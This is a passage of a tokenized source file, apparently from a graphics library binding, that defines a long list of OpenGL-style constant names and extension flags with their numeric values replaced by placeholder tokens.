<EOL> MGL_PROGRAM_ERROR_POSITION_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_WITHOUT_FLUSH_NV = <NUM_LIT> <EOL> MGL_CON_19_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_DT_SIZE_NV = <NUM_LIT> <EOL> kMGLext_ARB_texgen_reflection = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_SELECTION_BUFFER_POINTER = <NUM_LIT> <EOL> MGL_CON_2_ATI = <NUM_LIT> <EOL> MGL_CON_18_ATI = <NUM_LIT> <EOL> MGL_TEXTURE25 = <NUM_LIT> <EOL> MGL_FEEDBACK_BUFFER_TYPE = <NUM_LIT> <EOL> MGL_CON_17_ATI = <NUM_LIT> <EOL> MGL_OPERAND2_RGB_EXT = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_FEEDBACK_BUFFER_SIZE = <NUM_LIT> <EOL> MGL_PIXEL_COUNTER_BITS_ARB = <NUM_LIT> <EOL> MGL_LINE_STRIP = <NUM_LIT:3> <EOL> MGL_NORMAL_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_ENV_COLOR = <NUM_LIT> <EOL> MGL_FEEDBACK_BUFFER_POINTER = <NUM_LIT> <EOL> MGL_CON_15_ATI = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_TEXTURE_COORDS = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_PROGRAM_TARGET_NV = <NUM_LIT> <EOL> MGL_TEXTURE_RED_TYPE = <NUM_LIT> <EOL> MGL_2X_BIT_ATI = <NUM_LIT:1> <EOL> MGL_EDGE_FLAG_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX4 = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_POINTER_NV = <NUM_LIT> <EOL> MGL_FALSE = <NUM_LIT:0> <EOL> MGL_TEXTURE_DS_SIZE_NV = <NUM_LIT> <EOL> MGL_2D = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_MAP2_GRID_SEGMENTS = <NUM_LIT> <EOL> MGL_CON_1_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_GREEN_SIZE = <NUM_LIT> <EOL> MGL_CON_12_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_ZERO_EXT = <NUM_LIT> <EOL> MGL_MAP2_GRID_DOMAIN = <NUM_LIT> <EOL> kMGLext_NV_primitive_restart = <NUM_LIT> <EOL> MGL_DYNAMIC_READ_ARB = <NUM_LIT> <EOL> MGL_CON_11_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_DOT3_ATI = <NUM_LIT> <EOL> MGL_MAP1_GRID_SEGMENTS = <NUM_LIT> <EOL> MGL_PIXEL_MAP_G_TO_G = <NUM_LIT> <EOL> MGL_CON_10_ATI = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_IMAGES_EXT = <NUM_LIT> <EOL> 
MGL_TEXTURE_COORD_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_MAX_CUBE_MAP_TEXTURE_SIZE_ARB = <NUM_LIT> <EOL> MGL_LOCAL_CONSTANT_VALUE_EXT = <NUM_LIT> <EOL> MGL_MAP1_GRID_DOMAIN = <NUM_LIT> <EOL> MGL_CON_9_ATI = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX_STACK_DEPTH_NV = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_POINT = <NUM_LIT> <EOL> MGL_MAX_VERTEX_UNIFORM_COMPONENTS_ARB = <NUM_LIT> <EOL> MGL_FEEDBACK = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX3 = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Z_ARB = <NUM_LIT> <EOL> MGL_MATRIX7_NV = <NUM_LIT> <EOL> kMGLext_MGLX_create_new_context = <NUM_LIT> <EOL> MGL_VERTEX_ID_NV = <NUM_LIT> <EOL> MGL_CON_7_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_LO_SIZE_NV = <NUM_LIT> <EOL> MGL_NUM_LOOPBACK_COMPONENTS_ATI = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE_ALPHA_ARB = <NUM_LIT> <EOL> MGL_CON_6_ATI = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE23 = <NUM_LIT> <EOL> MGL_MATRIX5_NV = <NUM_LIT> <EOL> MGL_LINE = <NUM_LIT> <EOL> MGL_OPERAND0_RGB_EXT = <NUM_LIT> <EOL> MGL_UNSIGNED_SHORT = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX4_NV = <NUM_LIT> <EOL> MGL_PIXEL_COUNT_NV = <NUM_LIT> <EOL> MGL_POINT = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_DRAW_BUFFER = <NUM_LIT> <EOL> MGL_MATRIX3_NV = <NUM_LIT> <EOL> kMGLext_ARB_color_buffer_float = <NUM_LIT> <EOL> MGL_CON_3_ATI = <NUM_LIT> <EOL> MGL_REG_6_ATI = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_CON_13_ATI = <NUM_LIT> <EOL> MGL_MATRIX2_NV = <NUM_LIT> <EOL> MGL_LUMINANCE_ALPHA = <NUM_LIT> <EOL> MGL_COPY_PIXEL_TOKEN = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_MATRIX2 = <NUM_LIT> <EOL> MGL_MATRIX1_NV = <NUM_LIT> <EOL> MGL_LUMINANCE = <NUM_LIT> <EOL> MGL_RENDERBUFFER_HEIGHT = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX0_NV = 
<NUM_LIT> <EOL> MGL_FLOAT_MAT3_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_ENV_MODE = <NUM_LIT> <EOL> MGL_RGBA = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_NEGATIVE_Z_EXT = <NUM_LIT> <EOL> MGL_MAX_TRACK_MATRICES_NV = <NUM_LIT> <EOL> MGL_RGB = <NUM_LIT> <EOL> MGL_SOURCE2_ALPHA_EXT = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_REG_8_ATI = <NUM_LIT> <EOL> MGL_MAX_TRACK_MATRIX_STACK_DEPTH_NV = <NUM_LIT> <EOL> MGL_CURRENT_OCCLUSION_QUERY_ID_NV = <NUM_LIT> <EOL> MGL_ALPHA = <NUM_LIT> <EOL> MGL_CLAMP_TO_BORDER_SGIS = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_TEMPORARIES = <NUM_LIT> <EOL> MGL_MODULATE = <NUM_LIT> <EOL> MGL_INVERSE_TRANSPOSE_NV = <NUM_LIT> <EOL> MGL_BLUE = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_TEMPORARIES = <NUM_LIT> <EOL> MGL_TRANSPOSE_NV = <NUM_LIT> <EOL> MGL_GREEN = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_TEMPORARIES = <NUM_LIT> <EOL> MGL_PACK_SKIP_PIXELS = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_IMAGE_UNITS_NV = <NUM_LIT> <EOL> MGL_INVERSE_NV = <NUM_LIT> <EOL> MGL_RED = <NUM_LIT> <EOL> MGL_PACK_IMAGE_HEIGHT = <NUM_LIT> <EOL> MGL_PROGRAM_TEMPORARIES = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_LOCAL_CONSTANTS_EXT = <NUM_LIT> <EOL> MGL_IDENTITY_NV = <NUM_LIT> <EOL> MGL_COMPRESSED_ALPHA_ARB = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_CLIP_PLANE5 = <NUM_LIT> <EOL> MGL_MODELVIEW_PROJECTION_NV = <NUM_LIT> <EOL> MGL_PROGRAM_PARAMETER_NV = <NUM_LIT> <EOL> MGL_STENCIL_INDEX = <NUM_LIT> <EOL> MGL_MATRIX26 = <NUM_LIT> <EOL> MGL_TEXTURE_BLUE_TYPE = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_PROGRAM_STRING_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_B = <NUM_LIT> <EOL> kMGLext_EXT_texture_filter_anisotropic = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_COLOR_INDEX = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGB8_NV = <NUM_LIT> <EOL> MGL_PROGRAM_LENGTH_NV = 
<NUM_LIT> <EOL> MGL_STENCIL = <NUM_LIT> <EOL> MGL_CURRENT_NORMAL = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_EXT = <NUM_LIT> <EOL> MGL_CURRENT_ATTRIB_NV = <NUM_LIT> <EOL> MGL_DEPTH = <NUM_LIT> <EOL> MGL_PROGRAM_BINDING = <NUM_LIT> <EOL> MGL_MATRIX0 = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_TYPE_NV = <NUM_LIT> <EOL> MGL_OPERAND1_RGB_EXT = <NUM_LIT> <EOL> MGL_COLOR = <NUM_LIT> <EOL> MGL_RENDERBUFFER = <NUM_LIT> <EOL> MGL_PROGRAM_FORMAT = <NUM_LIT> <EOL> MGL_DOT3_RGBA_EXT = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_TEXTURE = <NUM_LIT> <EOL> MGL_MAX_3D_TEXTURE_SIZE_EXT = <NUM_LIT> <EOL> MGL_NEGATIVE_X_EXT = <NUM_LIT> <EOL> MGL_REG_19_ATI = <NUM_LIT> <EOL> MGL_PROJECTION = <NUM_LIT> <EOL> MGL_MAX_MODELVIEW_STACK_DEPTH = <NUM_LIT> <EOL> MGL_EXP = <NUM_LIT> <EOL> MGL_MAX_3D_TEXTURE_SIZE = <NUM_LIT> <EOL> MGL_FLOAT_RGBA_MODE_NV = <NUM_LIT> <EOL> MGL_RGBA_UNSIGNED_DOT_PRODUCT_MAPPING_NV = <NUM_LIT> <EOL> MGL_CURRENT_VERTEX_ATTRIB = <NUM_LIT> <EOL> MGL_R = <NUM_LIT> <EOL> MGL_COLOR_INDEXES = <NUM_LIT> <EOL> MGL_PROGRAM_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_R = <NUM_LIT> <EOL> MGL_BLUE_BIAS = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB14_4_NV = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH_EXT = <NUM_LIT> <EOL> MGL_PROGRAM_ERROR_STRING = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB13_4_NV = <NUM_LIT> <EOL> MGL_FRAMEBUFFER = <NUM_LIT> <EOL> MGL_OUT_OF_MEMORY = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH = <NUM_LIT> <EOL> MGL_OP_SUB_EXT = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_EMISSION = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_3D_EXT = <NUM_LIT> <EOL> MGL_W_EXT = <NUM_LIT> <EOL> kMGLext_NV_occlusion_query = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB11_4_NV = <NUM_LIT> <EOL> MGL_MATRIX24 = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_3D = <NUM_LIT> <EOL> MGL_FLOAT_CLEAR_COLOR_VALUE_NV = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB10_4_NV = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_IMAGES = <NUM_LIT> <EOL> MGL_PROGRAM_FORMAT_ASCII = <NUM_LIT> <EOL> MGL_T = <NUM_LIT> <EOL> 
MGL_MAP2_VERTEX_ATTRIB9_4_NV = <NUM_LIT> <EOL> MGL_REG_2_ATI = <NUM_LIT> <EOL> MGL_COMPRESSED_ALPHA = <NUM_LIT> <EOL> MGL_COLOR_SUM = <NUM_LIT> <EOL> MGL_VERTEX_STATE_PROGRAM_NV = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_ARB = <NUM_LIT> <EOL> MGL_COPY_INVERTED = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_TWO_SIDE = <NUM_LIT> <EOL> MGL_MULTISAMPLE_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Z_ARB = <NUM_LIT> <EOL> MGL_COMPRESSED_RGB_S3TC_DXT1_EXT = <NUM_LIT> <EOL> kMGLext_MGLX_choose_fbconfig = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB7_4_NV = <NUM_LIT> <EOL> MGL_RESCALE_NORMAL_EXT = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_POINT_SIZE = <NUM_LIT> <EOL> MGL_MIRRORED_REPEAT_IBM = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_INVERT = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM = <NUM_LIT> <EOL> MGL_Z_EXT = <NUM_LIT> <EOL> MGL_SEPARATE_SPECULAR_COLOR = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB5_4_NV = <NUM_LIT> <EOL> MGL_SOURCE1_RGB_EXT = <NUM_LIT> <EOL> MGL_SWIZZLE_STRQ_DQ_ATI = <NUM_LIT> <EOL> MGL_SINGLE_COLOR = <NUM_LIT> <EOL> MGL_LIGHTING_BIT = <NUM_LIT:64> <EOL> MGL_NOR = <NUM_LIT> <EOL> MGL_S = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_COLOR_CONTROL = <NUM_LIT> <EOL> kMGLext_ARB_texture_float = <NUM_LIT> <EOL> MGL_OR = <NUM_LIT> <EOL> MGL_REG_1_ATI = <NUM_LIT> <EOL> MGL_SWIZZLE_STQ_DQ_ATI = <NUM_LIT> <EOL> MGL_CULL_VERTEX_OBJECT_POSITION_EXT = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB2_4_NV = <NUM_LIT> <EOL> MGL_SWIZZLE_STR_DR_ATI = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> kMGLext_ARB_texture_non_power_of_two = <NUM_LIT> <EOL> MGL_CULL_VERTEX_EYE_POSITION_EXT = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB1_4_NV = <NUM_LIT> <EOL> MGL_CULL_VERTEX_EXT = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_DECAL = <NUM_LIT> <EOL> MGL_AND_INVERTED = <NUM_LIT> <EOL> MGL_SWIZZLE_STR_ATI = <NUM_LIT> <EOL> MGL_Y_EXT = <NUM_LIT> <EOL> MGL_ARRAY_ELEMENT_LOCK_COUNT_EXT = <NUM_LIT> <EOL> MGL_TRIANGLE_FAN = <NUM_LIT:6> <EOL> MGL_MAP1_VERTEX_ATTRIB15_4_NV = 
<NUM_LIT> <EOL> MGL_SOURCE0_RGB_EXT = <NUM_LIT> <EOL> MGL_COLOR_ALPHA_PAIRING_ATI = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_POINT_SIZE_NV = <NUM_LIT> <EOL> MGL_ARRAY_ELEMENT_LOCK_FIRST_EXT = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB14_4_NV = <NUM_LIT> <EOL> MGL_SIGNED_HILO16_NV = <NUM_LIT> <EOL> MGL_CLAMP_TO_BORDER_ARB = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB13_4_NV = <NUM_LIT> <EOL> MGL_REG_0_ATI = <NUM_LIT> <EOL> MGL_NUM_INPUT_INTERPOLATOR_COMPONENTS_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_FAIL_VALUE_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD31_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB12_4_NV = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_UNITS = <NUM_LIT> <EOL> MGL_UNPACK_ALIGNMENT = <NUM_LIT> <EOL> MGL_TEXTURE_GEQUAL_R_SGIX = <NUM_LIT> <EOL> MGL_VECTOR_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB11_4_NV = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_INVARIANTS_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_LEQUAL_R_SGIX = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB10_4_NV = <NUM_LIT> <EOL> kMGLext_ARB_OpenMGL20 = <NUM_LIT> <EOL> MGL_NUM_PASSES_ATI = <NUM_LIT> <EOL> MGL_X_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_OPERATOR_SGIX = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_TWO_SIDE_NV = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB9_4_NV = <NUM_LIT> <EOL> MGL_V3F = <NUM_LIT> <EOL> MGL_CLAMP = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_SGIX = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_RECTANGLE = <NUM_LIT> <EOL> kMGLext_EXT_vertex_shader = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB8_4_NV = <NUM_LIT> <EOL> MGL_VERSION = <NUM_LIT> <EOL> MGL_COMPARE_R_TO_TEXTURE_ARB = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB7_4_NV = <NUM_LIT> <EOL> MGL_AND = <NUM_LIT> <EOL> MGL_SECONDARY_INTERPOLATOR_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_FUNC_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD30_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB6_4_NV = <NUM_LIT> <EOL> MGL_DOT2_ADD_ATI = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_PIXELS = 
<NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_MODE_ARB = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB5_4_NV = <NUM_LIT> <EOL> MGL_CND0_ATI = <NUM_LIT> <EOL> MGL_DEPTH_TEXTURE_MODE_ARB = <NUM_LIT> <EOL> MGL_CURRENT_VERTEX_WEIGHT_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB4_4_NV = <NUM_LIT> <EOL> MGL_LINEAR_MIPMAP_LINEAR = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_OPTIMIZED_EXT = <NUM_LIT> <EOL> kMGLext_convolution = <NUM_LIT> <EOL> MGL_MATRIX17 = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB3_4_NV = <NUM_LIT> <EOL> MGL_V2F = <NUM_LIT> <EOL> MGL_NEAREST_MIPMAP_LINEAR = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT32_ARB = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB2_4_NV = <NUM_LIT> <EOL> MGL_LINEAR_MIPMAP_NEAREST = <NUM_LIT> <EOL> MGL_HILO16_NV = <NUM_LIT> <EOL> MGL_MATRIX15 = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB1_4_NV = <NUM_LIT> <EOL> MGL_FRONT = <NUM_LIT> <EOL> MGL_NEAREST_MIPMAP_NEAREST = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT16_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD29_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB0_4_NV = <NUM_LIT> <EOL> MGL_LINEAR = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_ROWS = <NUM_LIT> <EOL> MGL_MATRIX13 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY15_NV = <NUM_LIT> <EOL> kMGLext_SGIX_depth_texture = <NUM_LIT> <EOL> MGL_MATRIX12 = <NUM_LIT> <EOL> MGL_MODELVIEW1_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY14_NV = <NUM_LIT> <EOL> MGL_T2F_C3F_V3F = <NUM_LIT> <EOL> MGL_TEXTURE_SHADER_NV = <NUM_LIT> <EOL> MGL_EYE_PLANE = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_LOCALS_EXT = <NUM_LIT> <EOL> MGL_POINT_SIZE_MAX_ARB = <NUM_LIT> <EOL> kMGLext_NV_fragment_program = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY13_NV = <NUM_LIT> <EOL> MGL_MATRIX19 = <NUM_LIT> <EOL> MGL_OBJECT_PLANE = <NUM_LIT> <EOL> MGL_POINT_SIZE_MIN_ARB = <NUM_LIT> <EOL> MGL_PROGRAM_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY12_NV = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_MODE = <NUM_LIT> <EOL> MGL_VENDOR = <NUM_LIT> <EOL> 
MGL_INVARIANT_VALUE_EXT = <NUM_LIT> <EOL> MGL_MATRIX9 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY11_NV = <NUM_LIT> <EOL> MGL_BACK = <NUM_LIT> <EOL> MGL_BYTE = <NUM_LIT> <EOL> MGL_SPHERE_MAP = <NUM_LIT> <EOL> MGL_BGRA_EXT = <NUM_LIT> <EOL> MGL_COLOR_INDEX4_EXT = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY10_NV = <NUM_LIT> <EOL> MGL_OBJECT_LINEAR = <NUM_LIT> <EOL> MGL_UNPACK_ROW_LENGTH = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Y_ARB = <NUM_LIT> <EOL> MGL_BGR_EXT = <NUM_LIT> <EOL> kMGLext_ARB_vertex_blend = <NUM_LIT> <EOL> kMGLext_MGLX_create_pbuffer = <NUM_LIT> <EOL> kMGLext_ARB_shadow_ambient = <NUM_LIT> <EOL> MGL_SIGNED_ALPHA8_NV = <NUM_LIT> <EOL> MGL_MULTISAMPLE_BIT_ARB = <NUM_LIT> <EOL> MGL_FLOAT_VEC4_ARB = <NUM_LIT> <EOL> MGL_SIGNED_ALPHA_NV = <NUM_LIT> <EOL> MGL_LOAD = <NUM_LIT> <EOL> MGL_MATRIX5 = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_TEXTURE22 = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE8_ALPHA8_NV = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_VALUE_ARB = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_EXT = <NUM_LIT> <EOL> MGL_INTERLEAVED_ATTRIBS_EXT = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE_ALPHA_NV = <NUM_LIT> <EOL> MGL_DSDT_MAG_NV = <NUM_LIT> <EOL> MGL_SAMPLES_ARB = <NUM_LIT> <EOL> kMGLext_ARB_half_float_pixel = <NUM_LIT> <EOL> MGL_COMPILE = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE8_NV = <NUM_LIT> <EOL> kMGLext_MGLX_get_visual_from_fbconfig_sgix = <NUM_LIT> <EOL> MGL_SAMPLE_BUFFERS_ARB = <NUM_LIT> <EOL> MGL_COLOR_INDEX2_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_INTENSITY_SIZE = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE_NV = <NUM_LIT> <EOL> MGL_UNPACK_LSB_FIRST = <NUM_LIT> <EOL> MGL_MATRIX1 = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> kMGLext_ARB_shadow = <NUM_LIT> <EOL> MGL_Q = <NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_ONE_ARB = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHTING_EXT = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_make_current_read = <NUM_LIT> <EOL> MGL_SIGNED_RGB_NV = <NUM_LIT> <EOL> MGL_RETURN = <NUM_LIT> <EOL> MGL_STENCIL_BITS = 
<NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_COVERAGE_ARB = <NUM_LIT> <EOL> MGL_TRIANGLE_STRIP = <NUM_LIT:5> <EOL> MGL_ADD_SIGNED_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGBA8_NV = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Z = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_MATRIX_STACK_DEPTH = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGBA_NV = <NUM_LIT> <EOL> MGL_DSDT_NV = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_MATRICES = <NUM_LIT> <EOL> MGL_SHORT = <NUM_LIT> <EOL> MGL_EXTENSIONS = <NUM_LIT> <EOL> MGL_MAX_VERTEX_ATTRIBS = <NUM_LIT> <EOL> MGL_COLOR_INDEX1_EXT = <NUM_LIT> <EOL> MGL_TEXTURE22_ARB = <NUM_LIT> <EOL> MGL_SIGNED_HILO_NV = <NUM_LIT> <EOL> MGL_UNPACK_SWAP_BYTES = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX_STACK_DEPTH = <NUM_LIT> <EOL> MGL_TEXTURE21_ARB = <NUM_LIT> <EOL> MGL_EIGHTH_BIT_ATI = <NUM_LIT:32> <EOL> MGL_RENDERER = <NUM_LIT> <EOL> MGL_TRANSPOSE_CURRENT_MATRIX = <NUM_LIT> <EOL> MGL_FLOAT_VEC2_ARB = <NUM_LIT> <EOL> MGL_TEXTURE20_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_HI_SIZE_NV = <NUM_LIT> <EOL> MGL_DSDT_MAG_VIB_NV = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_VARIANTS_EXT = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX = <NUM_LIT> <EOL> MGL_TEXTURE19_ARB = <NUM_LIT> <EOL> MGL_DECR = <NUM_LIT> <EOL> MGL_PROGRAM_ERROR_POSITION = <NUM_LIT> <EOL> MGL_PROGRAM_LENGTH = <NUM_LIT> <EOL> MGL_TEXTURE_RECTANGLE = <NUM_LIT> <EOL> kMGLext_EXT_vertex_weighting = <NUM_LIT> <EOL> MGL_TEXTURE18_ARB = <NUM_LIT> <EOL> MGL_INCR = <NUM_LIT> <EOL> MGL_REPLACE = <NUM_LIT> <EOL> MGL_CON_22_ATI = <NUM_LIT> <EOL> MGL_PROGRAM_STRING = <NUM_LIT> <EOL> MGL_TEXTURE17_ARB = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_ATTRIBS_EXT = <NUM_LIT> <EOL> MGL_HILO_NV = <NUM_LIT> <EOL> MGL_PROGRAM_UNDER_NATIVE_LIMITS = <NUM_LIT> <EOL> MGL_COLOR_TABLE_INTENSITY_SIZE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE16_ARB = <NUM_LIT> <EOL> MGL_KEEP = <NUM_LIT> <EOL> MGL_PIXEL_MAP_A_TO_A_SIZE = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ENV_PARAMETERS 